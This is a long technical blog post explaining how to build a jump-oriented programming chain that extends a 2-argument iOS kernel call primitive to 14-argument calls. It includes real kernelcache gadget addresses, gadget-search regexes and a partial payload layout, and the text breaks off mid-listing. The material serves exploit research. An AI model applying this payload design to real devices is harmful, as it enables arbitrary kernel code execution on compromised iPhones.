Designing an advanced kernel function call primitive on iOS
In this post I’m going to describe a technique for calling arbitrary kernel functions on iOS that extends a 2-argument function call primitive to support up to 14 64-bit arguments. This is a refinement of memctl’s first call strategy, which extends a 6-argument function call primitive into an 8-argument call. My goal is to shed light on how I design jump-oriented programs, and hopefully provide a reference for others looking to design similar programs.
I first developed the 14-argument kernel function call strategy in November of last year, and then introduced an updated variant at the end of January. You can see the implementations in the files call_strategy_3.c and call_strategy_5.c. This post will examine call strategy 5 since this strategy works on the iPhone 8 running iOS 11.1.2, which at the time of writing is the most recent platform with a public kernel exploit.
As a word of warning, this is a long and technical post, and won’t be for everyone. I’m writing primarily for two target audiences: those who are interested in memctl’s implementation and those who want a detailed explanation of designing jump-oriented programs. For the latter group, the point of this article is to communicate the process I use for JOP design to provide a reference that can be used for other JOP programs. If you find it getting dry in the middle, skip ahead to the more interesting parts.
Table of Contents
- Framing the challenge
- High-level overview
- The ARM64 calling convention
- Jump-oriented programming: a primer
- An aside: Generality vs elegance in JOP design
- Collecting kernelcache gadgets
- A preliminary design
- Choosing a prologue gadget
- Loading the arguments to the function
- Performing the function call
- The dispatch gadget
- Refining the design
- The final JOP program
- Laying out the payload in memory
- Getting it right the first time
- Conclusion
Framing the challenge
Even after compromising the iOS kernel, numerous security mitigations make it difficult to inject new code: no memory regions are both writable and executable, and trying to execute code in a memory region that was remapped as executable after the fact will trigger a panic. The most straightforward way to execute arbitrary code in the kernel is to reuse existing code fragments in new ways. Usually this is done using a technique called return-oriented programming, or ROP, although on arm64 I’m partial to a slightly different technique called jump-oriented programming, or JOP.1
The most portable way to use ROP or JOP to execute arbitrary code is to perform the majority of computation in userspace and then call kernel functions to perform any actions that cannot be done from userspace.2 This motivates the development of techniques to call arbitrary kernel functions with arbitrary arguments.
To begin with, we assume the existence of kernel memory read and write primitives and a 2-argument kernel function call primitive with no return value. While this may seem like a lot, there are two things worth considering. First, there are many ways to build a kernel call primitive out of a kernel read/write primitive (the most popular probably being the iokit_user_client_trap method), so all we really need is the read/write primitive. Second, because the JOP payload can be compacted to around 768 bytes, this strategy can also be used directly as an exploit payload for certain IOKit vulnerabilities that lead to bad virtual method calls.
Using these primitives, we will develop a technique to call arbitrary kernel functions with up to
14 full (that is, 64-bit) arguments and retrieve the full return value in userspace. The original
goal was to support 12 arguments, which is sufficient to cover most interesting kernel functions,
including the 10-argument function mount_common
. However, while scanning for gadgets to get an
idea for how I would structure the JOP program, I discovered that supporting 14 arguments was no
more difficult.
High-level overview
The JOP program can be divided into 4 high-level steps:
- Set up the registers and, if necessary, the stack so that the target function can be called with the appropriate arguments.
- Call the target function.
- Store the return value so it is accessible by userspace.
- Safely resume execution back in our caller.
The first two steps are relatively straightforward, but the latter two could use elaboration.
Once we’re done calling the target function, we need to do two things: safely stop running kernel code and retrieve the value returned by the target function back in userspace. Both of these challenges are complicated by themselves but relatively easy given our prior assumptions.
For safely returning from the kernel, it suffices to note that we are extending an existing 2-argument kernel call primitive which must itself safely return from kernel code to user code. Thus, if we make our JOP program itself behave like a kernel function, returning to our caller when done, then the 2-argument kernel call primitive will take care of safely returning to userspace.
For the other challenge, getting the return value of the function call to userspace, we can simply have the JOP program store the return value in memory and rely on our kernel memory read primitive in userspace to retrieve the value once the payload finishes running.
The ARM64 calling convention
In order to figure out how to call a kernel function with 14 arguments, we first need to understand how functions are actually called on the iPhone. This is referred to as the calling convention for the platform: it specifies where the various arguments to the function go so that the callee knows where to find them. 64-bit iPhones use the ARMv8 AArch64 architecture, which has an official procedure call standard. However, Apple has chosen to diverge slightly from the official standard when designing its own calling convention. Because of that, we’ll focus on Apple’s convention, and we’ll refer to Apple’s architecture as arm64 rather than AArch64 to clarify that we’re diverging from the official ABI.3
To simplify matters, we will ignore all non-integral arguments and all arguments larger than 64 bits. That means, for example, that we will not consider the case of calling a function that takes a floating point argument. This is not a huge limitation in the kernel since almost all function arguments are integers or pointers.
According to Apple’s arm64 convention, the first 8 arguments to a function get passed in registers
x0
through x7
, while subsequent arguments are laid out in order on the stack. Arguments placed
on the stack consume only as much stack space as required, although padding may be inserted between
arguments to ensure proper alignment. For example, consider the following function:
According to Apple’s convention, the arguments arg0
through arg7
get placed in registers x0
through x7
. Then, arguments arg8
through arg10
get laid out on the stack:
arg8
, being the first stack argument, starts at the top of the stack,sp + 0
. It is 1 byte long.arg9
is placed at the next available aligned address afterarg8
. Since the next available stack slot issp + 1
, andarg9
is 1 byte long, it fits atsp + 1
.arg10
is placed at the next available aligned address afterarg9
. This time, the next available stack slot issp + 2
, butarg10
is 8 bytes, meaning it will be unaligned if placed there. The next slot at whicharg10
fits with an 8-byte alignment issp + 8
.
Graphically, this means the stack looks like this:
We’ll need to respect this convention when laying out arguments on the stack.
The other thing we need to know about the calling convention is which registers must be saved by called functions and which ones are okay to clobber. This is important to know for two reasons: First, as mentioned previously, the JOP program itself will behave like a 2-argument kernel function, so it must not clobber registers its caller expects to remain unchanged. Second, the JOP program itself will call the target function, which means it must not save critical state in registers that may be clobbered over the course of the target function call.
On arm64, registers x19
through x28
are designated as callee-saved, which means that a caller
may expect their contents to remain unchanged across function calls and it’s the callee’s
responsibility to save these registers if it wants to use them. Furthermore, register x29
is the
frame pointer and register x30
is the link (or return address) register, which must be properly
initialized and managed over the lifetime of the function.
Jump-oriented programming: a primer
Jump-oriented programming (JOP) is a generalization of the return-oriented programming (ROP) code reuse technique that allows building an exploit payload by reusing segments of the original program code in new ways. There are two main advantages of JOP over ROP. First, JOP payloads do not need to rely on the stack as a linear control flow mechanism in the same way as ROP. This allows more flexibility when interacting with the stack: for example, a JOP program can set the stack pointer to an arbitrary value, while a ROP program cannot (at least, not if it hopes to keep executing afterwards). Second, since JOP is a generalization of ROP, using JOP allows more flexibility when selecting which pieces of program code to reuse, which in turn allows more flexibility when designing the payload. In fact, there are some exploit mitigations (like protected return addresses) that defeat ROP but do not defend against JOP because of its increased flexibility.
The high-level technique behind JOP is to chain together short sequences of instructions, which in
this context are called gadgets, that end in some form of indirect branch. If the attacker can gain
control of the contents of some registers or memory in addition to pc
(the program counter or
instruction pointer register), then it’s likely possible to guide execution through a few branches
to chain together pieces of useful computation. That’s basically the whole idea, although it’s much
easier to understand with some examples and a few useful strategies.
For example, consider finding the following gadget in an AArch64 program:
This gadget loads the 8-byte value pointed to by x7
into register x3
, increments x7
by 8,
then jumps to the address just loaded into x3
. If the value loaded into x3
were a short snippet
of code followed by a jump back to this gadget, then the second time this gadget were to run it
would jump to a new address, the one stored right after the first address in memory. If this
process were to repeat, assuming that each executed snippet jumps back to this gadget, we would see
that this gadget seems to interpret x7
as an array of pointers and jumps to each address in turn.
Such a gadget is referred to as a “dispatch gadget”. It is useful for guiding the execution of the
JOP program through a sequence of other gadgets that perform the actual work desired.
So, what would the other gadgets look like so that execution flows back to the dispatch gadget?
First, they must not clobber state used by the dispatch gadget, which in this case is register
x7
, or rely on any state that is clobbered by the dispatch gadget, in this case x3
.
Furthermore, they must return to the dispatch gadget at the end. While there are unlikely to be
many direct branches to the dispatch gadget, indirect branches through registers are far more
common. For example:
This gadget performs the useful work of computing the sum of registers x1
and x2
and storing
the result in x0
. At the end it performs an indirect jump back to x8
. Thus, if we ensure that
register x8
contains a pointer to the dispatch gadget, then this gadget can be used in the JOP
chain to compute sums.
As we will see, arm64 in the kernelcache is particularly well suited to jump-oriented programming due to the extensive set of general-purpose registers and the frequent use of indirect branches in compiled code.
An aside: Generality vs elegance in JOP design
When designing a ROP or JOP program, I almost always find that there’s a trade-off between what I call the “generality” of the program (how likely this program is to work across different software versions with different sets of available gadgets) and elegance (how cleanly and efficiently the program accomplishes its goal). For exploits in the wild, generality is usually the most important: you want the payload to work across as many different software versions as possible. However, for other types of exploits, the decision isn’t necessarily clear-cut. For example, it can be difficult to determine which sets of gadgets are likely to stick around and which will go away in the next release, which makes it hard to justify the time spent generalizing. Furthermore, highly general gadget selections often produce longer, more roundabout JOP programs that are more difficult to develop and maintain.
For personal projects I prefer to implement JOP programs elegantly without regard for generality. I find these programs easier to understand and more enjoyable to develop. Allowing JOP programs to be tightly coupled to the set of available gadgets allows you to leverage highly complex gadgets that accomplish very specific objectives. I took full advantage of this when designing this program. The downside is that several of the gadgets used have no viable alternative in the kernelcache, meaning that small changes could force substantial redesigns in future implementations of the program.
Collecting kernelcache gadgets
In order to get a list of gadgets in the kernelcache, we first need to obtain the kernelcache file
itself. The kernelcache can be copied directly from a device or extracted from an IPSW file
downloaded from Apple. I usually use ipsw.me to find the direct download links for specific
iPhone versions. Once you have the IPSW file, you can extract it using the unzip
utility (IPSW
files are really ZIP archives). Finally, you’ll need to decompress the kernelcache using one of a
number of available utilities, including joker and memctl.
My preferred method for gathering gadgets from the kernelcache is to use ROPgadget, a Python tool
that uses the Capstone engine for disassembly. As written ROPgadget will not recognize the
prelinked executable code segment __PLK_TEXT_EXEC
, which is where all of the code for IOKit
drivers is stored, and hence it will miss the majority of the gadgets. However, it’s relatively
straightforward to patch the tool to process all segments containing executable code.4
Once ROPgadget is set up, the following command will search for gadgets in the kernelcache:
This command will write a list of all ROP and JOP gadgets of length at most 13 instructions to the
file kernelcache-gadgets.txt
. From here, you can inspect the file and search for gadgets matching
specific criteria. As silly as it may sound, I find that opening the text file in vim and searching
for gadgets using regular expressions is completely sufficient for my needs.
You should see on the order of a million gadgets, but filtering out any gadgets with a hardcoded kernel address (which are less likely to be useful due to fixed branching) will reduce that to something more manageable. For example, the iOS 11.1.2 kernelcache for the iPhone 7 contains 1,537,404 unique gadgets of 13 or fewer instructions, but removing those with a hardcoded kernel address reduces the number to 371,209.
A preliminary design
We want to call a kernel function with 14 arguments, so we know by the arm64 calling convention that we’ll need to properly initialize the stack. We can roughly describe our desired JOP program as follows:
- Set up the stack.
- Copy the function arguments onto the stack and into registers.
- Call the target function.
- Store the return value in memory so it can be read back later.
- Clean up the stack.
- Return to our original caller so that we exit from the kernel cleanly.
It’s worth considering how each of these steps could be achieved before choosing exactly what gadgets to use.
First, let’s consider step 1, how we would set up stack memory using JOP. Since we want our entire JOP program to behave like a function, this step is really about performing the role of the function prologue: reserve stack space, save registers, etc. There are two relatively straightforward approaches: we could either try to find individual gadgets to perform these steps, or we could try to find an entire function prologue to use as a gadget. The first approach is in many ways simpler, since we would be chaining many small gadgets together to build our functionality. However, if we can find a function which reserves the necessary stack space and saves the appropriate registers before performing an indirect jump, we can greatly shorten the final JOP program.
Using an entire function prologue has another advantage: we can probably use the same function’s epilogue for cleanup and to return to our original caller. Thus, if we can find an appropriate function for step 1, we’ve probably also taken care of steps 5 and 6. This just leaves steps 2, 3, and 4.
For step 2, we need to copy the target function’s arguments onto the stack and into registers. Again, we could decompose this into individual steps, but it’s possible that some code in the kernel performs an indirect function call with a large number of saved parameters, which would make our lives much easier. For example, this step would be simple if we could find a gadget like the following C code:
This type of gadget would be helpful because it would perform all the work of loading the arguments
from memory and saving them into the appropriate registers and slots on the stack.5 However, if
we don’t find such a gadget, we will have to perform this step using multiple gadgets in sequence.
This means we will probably want gadgets or gadget sequences to load values from memory into
registers x0
through x7
and to copy values from memory onto the stack. Most likely, the
simplest way to perform all of this is to find a load gadget to load a value from memory,
some move gadgets to move values from the loaded registers into the desired registers, and a store
gadget to store a value to a specific memory location (in this case, the stack).
Now let’s consider step 3. Once we’ve initialized the registers and stack with the arguments, we
want to call the target function and then resume executing our JOP program. Once again, there are
two general approaches: we could initialize x30
(the return address register) and then perform a
branch to the target function, or we could try to find a gadget consisting of an indirect function
call followed by an indirect branch. I used the first approach in my original JOP strategies, but
the scarcity of these gadgets proved problematic: trying to work with the few gadgets that
manipulate register x30
placed severe constraints on the design of the final JOP program. Thus,
for this new strategy, I opted to consider trying to find a gadget that itself contained an
indirect function call and letting the architecture take care of register x30
for me.
Finally, that just leaves step 4, storing the return value from the target function in memory so
that once the JOP program returns to user space we can read it back. For this step we will need to
find a way to store the return value, in register x0
, to a known memory address. Thus, we will
want to look for gadgets using the str
instruction (or any of its relatives).
Now that we have an idea of what we’re looking for, it’s time to try and find our gadgets.
Choosing a prologue gadget
The first pieces I try to look for in any JOP program are the complicated or rare ones, since they usually dictate the shape of the final design. In this case, that includes the function prologue/epilogue that sets up the stack and saves registers and any gadget we can find that will load a bunch of values from memory into registers (or even onto the stack) for a function call.
First let’s consider the function prologue, for which we have a few criteria:
- We need the function prologue to reserve sufficient stack space to store arguments 8 through 14
(that is, six 64-bit words, or
0x30
bytes), on top of the space used to save registers. - Ideally the prologue would save (and the epilogue would restore) all registers clobbered by the
rest of the JOP program, since we want the JOP program to behave like a normal function.
According to the arm64 calling convention, registers
x19
throughx28
are callee-saved, whilex29
(the frame pointer register) andx30
(the link register or return address register) have special meanings and must be saved by the callee if the callee itself calls another function. Thus, the best we can hope for is a prologue that saves registersx19
throughx28
as well asx29
andx30
. - We need the function to perform an indirect jump using a register whose contents we control.
Since we only assume a 2-argument function call primitive to start, this means the indirect jump
must use a value obtained via register
x0
orx1
.
I first tried to search for typical prologue gadgets using the following vim-style regular expression, designed to match the part of the prologue that saves the callee-saved registers:
\(stp x[^;]*; \)\{5\}
Here are some typical examples of matched gadgets:
0xfffffff00629d494 : add sp, sp, #0x60 ; ret ; sub sp, sp, #0x60 ; stp x26, x25, [sp, #0x10] ; stp x24, x23, [sp, #0x20] ; stp x22, x21, [sp, #0x30] ; stp x20, x19, [sp, #0x40] ; stp x29, x30, [sp, #0x50] ; add x29, sp, #0x50 ; mov x19, x0 ; ldr x8, [x19] ; ldr x8, [x8, #0x580] ; blr x8
0xfffffff00631b940 : add sp, sp, #0x70 ; ret ; stp x26, x25, [sp, #-0x50]! ; stp x24, x23, [sp, #0x10] ; stp x22, x21, [sp, #0x20] ; stp x20, x19, [sp, #0x30] ; stp x29, x30, [sp, #0x40] ; add x29, sp, #0x40 ; mov x20, x0 ; ldr x0, [x20, #0x88] ; ldr x8, [x0] ; ldr x8, [x8, #0x88] ; blr x8
0xfffffff006c9d04c : ret ; stp x28, x27, [sp, #-0x60]! ; stp x26, x25, [sp, #0x10] ; stp x24, x23, [sp, #0x20] ; stp x22, x21, [sp, #0x30] ; stp x20, x19, [sp, #0x40] ; stp x29, x30, [sp, #0x50] ; add x29, sp, #0x50 ; mov x19, x0 ; ldr x0, [x19, #0x68] ; ldr x8, [x0] ; ldr x8, [x8, #0xb0] ; blr x8
Since the ret
instruction typically ends a function, we can deduce that the three function
prologues begin with the instructions sub sp, sp, #0x60
, stp x26, x25, [sp, #-0x50]!
, and stp
x28, x27, [sp, #-0x60]!
, respectively. By looking at more of these gadgets, we can eventually
determine that there are 2 different styles of prologue: one that begins with a sub
instruction
to reserve space on the stack and one that begins with a pre-indexed str
instruction to both
reserve space and store some values.
These gadgets also tell us how the prologue should lay out the stack. We can see that the registers
x29
and x30
get stored at the highest stack address, followed by any of the callee-saved
registers in reverse order. Any space after (that is, at a lower address than) the last
callee-saved register is used for local variables.
This means that for our function call we will want a prologue gadget that sets up the stack like this:
That is, we need a prologue that reserves at least 0x90
bytes of stack memory: 0x60
bytes for
saving registers and at least 0x30
bytes of local variables for the arguments for the target
function. (Of course, we don’t need the prologue gadget itself to initialize the arguments for the
target function; that will be done by another gadget.)
Using this criteria, we can search for gadgets matching each style that store the appropriate
registers and reserve sufficient stack space. In my case, I found a number of suitable sub
-style
gadgets:
0xfffffff0064abae0 : sub sp, sp, #0x90 ; stp x28, x27, [sp, #0x30] ; stp x26, x25, [sp, #0x40] ; stp x24, x23, [sp, #0x50] ; stp x22, x21, [sp, #0x60] ; stp x20, x19, [sp, #0x70] ; stp x29, x30, [sp, #0x80] ; add x29, sp, #0x80 ; mov x19, x0 ; ldr x0, [x19, #0x40] ; ldr x8, [x0] ; ldr x8, [x8, #0xd0] ; blr x8
0xfffffff0063adb7c : sub sp, sp, #0x90 ; stp x28, x27, [sp, #0x30] ; stp x26, x25, [sp, #0x40] ; stp x24, x23, [sp, #0x50] ; stp x22, x21, [sp, #0x60] ; stp x20, x19, [sp, #0x70] ; stp x29, x30, [sp, #0x80] ; add x29, sp, #0x80 ; mov x19, x0 ; ldr x8, [x19] ; ldr x8, [x8, #0x20] ; blr x8
0xfffffff0066012a0 : sub sp, sp, #0xa0 ; stp x28, x27, [sp, #0x40] ; stp x26, x25, [sp, #0x50] ; stp x24, x23, [sp, #0x60] ; stp x22, x21, [sp, #0x70] ; stp x20, x19, [sp, #0x80] ; stp x29, x30, [sp, #0x90] ; add x29, sp, #0x90 ; mov x19, x0 ; ldr x8, [x19] ; ldr x8, [x8, #0x390] ; blr x8
Fortunately, all of these gadgets also end in an indirect branch using a value read from memory
derived from register x0
, which means that we will control the branch address. Thus, any of these
prologues would serve completely fine for our purposes.
In my case, I decided to use the last gadget to build the payload because it affords an additional
0x10
bytes of scratch space on the stack if necessary. The full prologue and corresponding
epilogue are:
It’s clear from the epilogue gadget that the only state that needs to be preserved between the
prologue and the epilogue is the stack pointer register sp
. Any other registers are either not
caller-saved or restored by the epilogue. Thus, using this prologue/epilogue gadget pair allows us
to clobber any register except sp
in our JOP program.
Loading the arguments to the function
The next important gadget to find is the one that will load as many of the arguments for the target function call as possible; barring that, we at least want a gadget that will load a bunch of registers with values from memory so that we can move the values to the appropriate locations ourselves.
The key for this gadget is that we are looking for a number of consecutive loads. I searched with
the following vim regex, intended to capture a sequence of ldp
instructions reading from a
non-sp
register (to avoid epilogues):
\(ldp x..\?, x..\?, \[x[^;]*; \)\{5\}
All of the gadgets I found were of these two styles:
0xfffffff006be82a4 : ldp x19, x20, [x9, #-0x50] ; ldp x21, x22, [x9, #-0x40] ; ldp x23, x24, [x9, #-0x30] ; ldp x25, x26, [x9, #-0x20] ; ldp x27, x28, [x9, #-0x10] ; ldp x29, x30, [x9], #0x10 ; ld1 {v8.4s, v9.4s, v10.4s, v11.4s}, [x9], #0x40 ; ld1 {v12.4s, v13.4s, v14.4s, v15.4s}, [x9] ; add sp, sp, #0xe0 ; ret
0xfffffff006ce40dc : ldr x8, [x19] ; ldr x8, [x8, #0xe8] ; ldp x2, x3, [x23] ; ldp x4, x5, [x23, #0x10] ; ldp x6, x7, [x23, #0x20] ; ldp x9, x10, [x23, #0x30] ; ldp x11, x12, [x23, #0x40] ; stp x22, x21, [sp, #0x20] ; stp x11, x12, [sp, #0x10] ; stp x9, x10, [sp] ; mov x0, x19 ; mov x1, x20 ; blr x8
The first gadget looks like a function epilogue, except it uses x9
as the base register rather
than sp
and also involves vector instructions. This is not useless for our JOP program, since it
does not fully clobber sp
, but the modification of sp
at the end of the gadget is certainly
inconvenient.
The second gadget is much more promising. The first two instructions are not helpful6, but the rest of the gadget looks close to what we’re looking for:
This gadget effectively treats x23
as an array containing arguments 2 through 11 to the indirect
function call via x8
, while registers x19
, x20
, x21
, and x22
are treated as arguments 0,
1, 13, and 12, respectively. This gadget performs all the stack initialization we need, although
it’s not quite as good as we were hoping because the function and some of the arguments are loaded
from registers rather than memory. This means we will need to load those arguments from memory into
registers ourselves using other gadgets.
Performing the function call
To find a function call gadget, I looked for a blr
instruction followed by an indirect branch:
: blr x..\? ; \([^;]*; \)\{0,2\}bl\?r x..\?$
This search yielded many hits. Here are some examples of matching gadgets:
0xfffffff0071075cc : blr x20 ; movz w0, #0x74 ; blr x20
0xfffffff00681c340 : blr x21 ; ldr x8, [sp, #0xf60] ; br x8
0xfffffff0069d48e4 : blr x21 ; mov x1, x19 ; blr x20
0xfffffff0069da974 : blr x8 ; blr x24
0xfffffff0064219ec : blr x8 ; ldr x8, [x0] ; ldr x8, [x8, #0x138] ; blr x8
0xfffffff0069dbdac : blr x8 ; ldr x8, [x19, #0x350] ; ldr x8, [x8, #0xe8] ; blr x8
0xfffffff00659cbb8 : blr x8 ; mov x1, x0 ; mov x0, x25 ; blr x26
Unfortunately, several of these gadgets are unsuitable. For example, the first gadget immediately
clobbers the return value in register x0
while the fifth dereferences the return value as if it
were a pointer. Since we want to save the return value and we have no idea what it will be, neither
of these options are acceptable. The second gadget is also unusable because it reads the next
gadget to jump to from sp+f60
, which lies outside our function’s stack frame and hence is out of
our control.
The remaining gadgets, however, work fine, and it’s clear from scanning the file that there are numerous viable candidates. Thus, rather than commit to a single gadget at this point, it’s better to choose the right gadget later in the design process once we know what other constraints we’ll need to satisfy.
This in turn means that we won’t know what register the return value will be stored in until later, so there’s little point choosing a store gadget right now either.
The dispatch gadget
So far we’ve only looked at the complex gadgets. However, there is also an important simple gadget that will shape the final JOP program: the dispatch gadget.
The original kernel call strategy used the following gadget:
fffffff006a4e1a8 ldp x2, x1, [x1]
fffffff006a4e1ac br x2
This gadget is very similar to the example dispatch gadget in the introduction to JOP above, except
that this time the data structure containing the gadget pointers is a linked list rather than an
array. If we assume that the indirect branch to x2
will always eventually jump back to this
gadget, then this gadget effectively walks a linked list of nodes, where the first element in each
node is a pointer to the gadget to run and the second element in the node is a pointer to the next
node:
Under this interpretation, register x1
always points to the next JOP dispatch node and register
x2
is clobbered each time the dispatch gadget runs.
While I considered using several other dispatch gadgets, in the end I did not find a compelling reason to switch.
Refining the design
At this point we can begin designing the JOP program more concretely. The full and exact design process I used is too long, technical, and tedious for me to record here, but I hope to illuminate the first few steps I took in stitching the JOP program together. The rest of the design followed in the same way.
Let’s start from what we know: We will enter the JOP program using our prologue gadget, which I
call GADGET_PROLOGUE_2
; we will use the function call setup gadget, which I call
GADGET_POPULATE_2
; and then we will call execute the epilogue, GADGET_EPILOGUE_2
. Between
GADGET_PROLOGUE_2
and GADGET_POPULATE_2
, we will need to initialize at least 6 registers:
x23
, x22
, x21
, x20
, x19
, and x8
. After GADGET_POPULATE_2
we will need a function call
gadget, GADGET_CALL_FUNCTION_1
, and a gadget to store the return value to memory,
GADGET_STORE_RESULT_2
. Most of these gadgets will be chained together using the dispatch gadget,
JOP_DISPATCH
.
First let’s focus on the problem of setting those six registers before GADGET_POPULATE_2
. Since
four of the six registers are arguments to the target function, we’ll need to load those values
from memory. That means we’ll need a gadget to perform the loads. However, rather than reinventing
the wheel, it’s worth noting that we already have a gadget capable of loading numerous registers
from memory: GADGET_POPULATE_2
itself.
Consider how we might use GADGET_POPULATE_2
twice: first use it to load some values into
registers, then shift those values to the proper locations, then call GADGET_POPULATE_2
a second
time to set up the arguments to the function call. This has the advantage of performing all of the
loads in one shot and relegating the proper placement of values to simpler, easier to find, and
easier to replace mov
gadgets (that is, gadgets of the form mov Xdst, Xsrc ; br Xjmp
). The only
limitation is that we’ll still need to initialize a few crucial registers, namely x23
, x20
, and
x8
, before the first invocation.
The registers x23
and x8
are clearly crucial because they get used directly by the gadget, but
the reason x20
is important is more subtle. If this gadget is going to be used as part of a JOP
chain using the dispatch gadget mentioned earlier, then presumably the branch to x8
at the end of
GADGET_POPULATE_2
will invoke the dispatch gadget. However, the dispatch gadget relies on x1
to
store the next dispatch node, and GADGET_POPULATE_2
stores the value of x20
on entry into
register x1
on exit. Thus, before calling GADGET_POPULATE_2
the first time, we need to make
sure that x8
is a pointer to JOP_DISPATCH
and x20
is a pointer to the next dispatch node we
wish to execute. x23
, meanwhile, will be a pointer to a memory region containing the values we
want to load into the registers.
This gives us a much more manageable task to accomplish between GADGET_PROLOGUE_2
and
GADGET_POPULATE_2
: just fill those 3 registers.
However, we still need to figure out how to transition from GADGET_PROLOGUE_2
to executing our
JOP chain using the dispatch gadget. For reference, here is the end of GADGET_POPULATE_2
:
In order to execute the dispatch gadget, at the end of the prologue we need x8
to point to
JOP_DISPATCH
and x1
to point to the first node of our JOP chain. The latter is easy, because we
enter the JOP program with control of registers x0
and x1
due to our 2-argument call primitive.
In order to set x8
correctly, we need x0
to point to a memory region that at offset 0 contains
a pointer to another memory region that at offset 0x390
contains a pointer to JOP_DISPATCH
.
At this point, it becomes helpful to introduce a notation to keep track of all of the memory
regions and their relationships. Let’s call the memory region pointed to by x0
REGION_0
(for the moment) and the region containing the pointer to JOP_DISPATCH
at offset
0x390
REGION_1
. Then we can define the relationship between these regions explicitly using a
dictionary-like syntax:
REGION_0 = {
0: REGION_1
}
REGION_1 = {
390: JOP_DISPATCH
}
Now, as we uncover more values that need to be at specific positions in various memory regions, we can simply add entries to these definitions.
We can also write out explicit entry conditions for our JOP program:
pc = GADGET_PROLOGUE_2
x0 = REGION_0
x1 = JOP_CHAIN[0]
After GADGET_PROLOGUE_2
, we want to execute gadgets to set x23
to a memory region of values to
populate and x20
to a pointer to the next dispatch node after GADGET_POPULATE_2
(we already
took care of x8
in the prologue). The only data pointer we have in a register at this point is
REGION_0
in x0
and x19
, so it’s worth considering whether REGION_0
can serve the purposes
of either the memory population region (x23
) or the next dispatch node (x20
). That way, we
wouldn’t have to perform extra memory loads.
The dispatch node struct requires that offset 0 be a pointer to the gadget code to execute, which
conflicts with the definition of REGION_0
which has a pointer to REGION_1
at that offset. Thus,
we’ll need to load at least the next dispatch node pointer, x20
, from memory.
On the other hand, the memory population region doesn’t inherently conflict with REGION_0
.
GADGET_POPULATE_2
does load the value at offset 0 into register x2
, which means we would be
wasting one of our loaded registers by setting it to REGION_1
rather than something useful, but
x2
isn’t usable anyway because it gets clobbered by the dispatch gadget. All the other registers,
x3
through x7
and x9
through x12
, will be filled with valid data from that region. Thus, we
can safely make REGION_0
the region from which we populate register values. For clarity, I’ve
renamed this region REGION_POPULATE_VALUES
in the JOP program.
Getting back to the steps after our prologue gadget, we need to load a value from memory into x20
and copy either x0
or x19
into register x23
before executing GADGET_POPULATE_2
. Using the
regex : mov x23, x\(0\|19\) ; bl\?r x8
, I was able to quickly find a gadget for the latter:
0xfffffff00674c99c : mov x23, x19 ; br x8
Similarly, I using the following regex to look for candidate gadgets to load x20
:
: ldr x20, \[x\(0\|19\), [^;]*; \([^;]*; \)\{0,2\}bl\?r x8
There were several matching candidates, including:
0xfffffff006b8f858 : ldr x20, [x0, #0x40] ; ldr x8, [x0] ; ldr x8, [x8, #0xc8] ; blr x8
0xfffffff0072eb900 : ldr x20, [x0, #0x90] ; ldr x8, [x19, #0x70] ; blr x8
0xfffffff006291d34 : ldr x20, [x19, #0xc0] ; ldr x8, [x0] ; ldr x8, [x8, #0xa0] ; blr x8
The only important differences between these gadgets are the effects on the memory regions. For
example, the first gadget will require that REGION_POPULATE_VALUES
has a pointer to a memory
region at offset 0x40
, while the second gadget requires that REGION_POPULATE_VALUES
has a
pointer to a memory region at offset 0x90
. Choosing the right one will depend on what other
constraints get placed on the REGION_POPULATE_VALUES
memory region, and so we can leave the
specific choice until later in the design process.
I’ll leave off at this point: I hope you have enough of an idea of the design process, and I fear that continuing on will just be boring. Suffice to say, by continuing in this manner, it’s possible to fill in all of the gaps in the JOP program.
The final JOP program
Here is the final JOP program in its entirety. The way to read this is as follows:
- The listing shows the chronological execution of gadgets, starting with the call to the
2-argument primitive and ending with the JOP program’s final
ret
. - The first top-level (i.e., non-indented) statement represents the call to the 2-argument
primitive, called
kernel_call_2
. It is followed by first-level statements describing the register state and memory regions at the pointkernel_call_2
calls into the JOP payload. - Memory regions are defined using either byte-indexed dictionary syntax (for sparse regions) or array syntax (for contiguous regions). Memory regions are always accessed using byte indexing.
- Subsequent top-level statements indicate what gadget is being invoked. Each such top-level statement is followed by second-level statements containing the assembly of the gadget and first-level statements describing the state change of registers and memory.
- Since the
JOP_DISPATCH
gadget is executed so frequently, subsequent occurrences after the first have been elided such that the state changes are attributed to the preceding gadget.
kernel_call_2
REGION_POPULATE_VALUES = {
0: REGION_1
8: ARGUMENT_0
10: ARGUMENT_13
18: REGION_ARGUMENTS_2_TO_11
20: ARGUMENT_1
28: FUNCTION
30: GADGET_CALL_FUNCTION_1
38: GADGET_POPULATE_2
40
48: ARGUMENT_12
c0: JOP_CHAIN_2
268: REGION_2
288: <-RESULT
}
REGION_1 = {
a0: JOP_DISPATCH
d0: GADGET_STORE_RESULT_2
390: JOP_DISPATCH
}
REGION_ARGUMENTS_2_TO_11 = {
0: ARGUMENT_2
8: ARGUMENT_3
10: ARGUMENT_4
18: ARGUMENT_5
20: ARGUMENT_6
28: ARGUMENT_7
30: ARGUMENT_8
38: ARGUMENT_9
40: ARGUMENT_10
48: ARGUMENT_11
}
REGION_2 = {
0: REGION_3
}
REGION_3 = {
158: GADGET_EPILOGUE_2
}
JOP_CHAIN_1 = [
MOV_X23_X19__BR_X8
GADGET_INITIALIZE_X20_1
MOV_X25_X19__BR_X8
GADGET_POPULATE_2
]
JOP_CHAIN_2 = [
MOV_X19_X3__BR_X8
MOV_X20_X6__BLR_X8
MOV_X21_X4__BLR_X8
MOV_X22_X12__BLR_X8
MOV_X23_X5__BR_X8
MOV_X24_X7__BLR_X8
MOV_X8_X9__BR_X10
]
x0 = REGION_POPULATE_VALUES
x1 = JOP_CHAIN_1
pc = GADGET_PROLOGUE_2
GADGET_PROLOGUE_2 (0xfffffff0066012a0):
;; Save registers x19-x28, save the frame (x29, x30), and make
;; room for 0x40 bytes of local variables. sp must be
;; preserved until the epilogue.
sub sp, sp, #0xa0
stp x28, x27, [sp, #0x40]
stp x26, x25, [sp, #0x50]
stp x24, x23, [sp, #0x60]
stp x22, x21, [sp, #0x70]
stp x20, x19, [sp, #0x80]
stp x29, x30, [sp, #0x90]
add x29, sp, #0x90
mov x19, x0
ldr x8, [x19]
ldr x8, [x8, #0x390]
blr x8
SAVE_REGISTERS(x19, ..., x28)
x29 = STACK_FRAME()
RESERVE_STACK(0x40)
x19 = REGION_POPULATE_VALUES
x8 = REGION_POPULATE_VALUES[0] = REGION_1
x8 = REGION_1[0x390] = JOP_DISPATCH
pc = JOP_DISPATCH
;; Just after the prologue we have the following register values:
;; x0 = REGION_POPULATE_VALUES
;; x1 = JOP_CHAIN_1
;; x8 = JOP_DISPATCH
;; x19 = REGION_POPULATE_VALUES
